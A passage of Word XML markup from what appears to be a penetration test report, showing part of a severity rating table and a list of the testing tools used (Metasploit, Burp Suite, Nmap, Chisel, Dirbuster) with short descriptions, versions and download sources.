              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Vulnerabilities exist but are not exploitable or require extra steps such as social engineering. It is </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>advised to form</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="61FE24BA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6AA84F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018D" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>0.1-3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Vulnerabilities are non-exploitable but would reduce an organization’s attack surface. It is </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>advised to form</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="6DD3E9CE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6D9EEB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000018F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000190" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5516" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000191" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">No vulnerability exists. </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Additional</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> information is provided </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>regarding</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> items noticed during testing, strong controls, and </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>additional</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000192" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000193" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645209" w:id="41"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>7.2 Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000194" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.pzwynvfsjc8f" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="00000195" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="46AE12BA">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000196" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Open Source </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> framework which </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> modules for running exploits, post-exploitation, and the Meterpreter shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000197" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000198" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Reaa6a66c5ed44b35">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/metasploit-framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000199" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000019A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.a8wopw65wo46" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="0000019B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="09504D18">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000019C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Web Application </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> tool which can provide a proxy to intercept and </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>modify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> website requests, perform fuzzing on web endpoints, and create scope map of the victim website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="0000019D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> Community Edition - 2023.10.3.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000019E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="R9f3fa76ec5684361">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp/communitydownload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000019F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.kko8pqjcgrfa" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001A1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="4828AD96">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> Port scanning tool that can be used to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>enumerate</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> vulnerable services. </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Contains</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> a scripting engine for checking misconfigurations and vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 7.94</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="R138c9367a5154fad">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://gitlab.com/kalilinux/packages/nmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001A5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A6" w14:textId="55E1F634">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001A7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="48760A15">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> Network Tunneling executable that provides a Client-Server functionality to pivot into internal subnets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001A9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> v1.9.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001AA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Ra2b3b2bea1ef46f0">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/jpillora/chisel/releases</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000001AB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001AC" w14:textId="6D441546">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Dirbuster</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00352154" w14:paraId="000001AD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="7D674D7A">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001AE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Web enumeration tool used to discover unknown files and directories by </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>bruteforcing</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> paths in a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001AF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Version Number:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> 1.0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000001B0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
